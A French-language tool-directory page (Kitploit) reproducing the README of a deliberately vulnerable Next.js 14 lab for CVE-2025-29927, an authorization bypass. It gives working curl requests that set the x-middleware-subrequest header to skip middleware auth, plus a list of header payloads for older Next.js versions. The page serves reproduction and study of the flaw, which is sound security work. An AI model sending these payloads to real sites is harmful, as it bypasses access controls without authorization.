Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — ne pas utiliser. vulnérable | Kitploit
Outils/GitHubGitHub/adjscent/vulnerable-nextjs-14-cve-2025-29927
Authentification et AutorisationAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubadjscent/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

ne pas utiliser. vulnérable

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
5il y a 11 moisPas encore vérifié
Partager

Reproduction du contournement d'autorisation CVE-2025-29927

Ce dépôt est une reproduction de la vulnérabilité CVE-2025-29927 dans le paquet next

Comment reproduire

  1. Suivez les étapes ci-dessous pour cloner et exécuter l'application Next.js
  2. Vérifiez que l'autorisation refuse l'accès au point de terminaison /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Testez que l'autorisation fonctionne lorsque le jeton est fourni
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Maintenant, il peut également être contourné si nous imbriquons middleware 5 fois dans l'en-tête spécial x-middleware-subrequest :
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Exploitation de CVE-2025-29927 pour les versions plus anciennes de Next.js

Les versions Next.js 12 et 13 utilisaient une convention de nommage différente pour le fichier middleware (_middleware.js), qui a été modifié en middleware.js dans Next.js 14. Cette vulnérabilité peut être exploitée dans les versions plus anciennes en utilisant le fichier _middleware.js.

Par exemple, les charges utiles suivantes s'appliqueraient, en fonction de la version de Next.js et de votre convention de routage :

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (pour les versions Next.js 12.2 avec le fichier middleware.js à la racine de l'application, pas dans le répertoire pages)
  • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (pour les versions Next.js 11 et jusqu'à 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Pour commencer

Tout d'abord, lancez le serveur de développement :

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Ouvrez http://localhost:3000 avec votre navigateur pour voir le résultat.

Vous pouvez commencer à modifier la page en modifiant app/page.js. La page se met à jour automatiquement au fur et à mesure de vos modifications.

Ce projet utilise next/font pour optimiser et charger automatiquement Geist, une nouvelle famille de polices pour Vercel.

En savoir plus

Pour en savoir plus sur Next.js, consultez les ressources suivantes :

  • Documentation Next.js - découvrez les fonctionnalités et l'API de Next.js.
  • Apprendre Next.js - un tutoriel interactif Next.js.

Vous pouvez consulter le dépôt GitHub de Next.js - vos retours et contributions sont les bienvenus !

Déployer sur Vercel

Le moyen le plus simple de déployer votre application Next.js est d'utiliser la Plateforme Vercel des créateurs de Next.js.

Consultez notre documentation de déploiement Next.js pour plus de détails.

Télécharger l’outil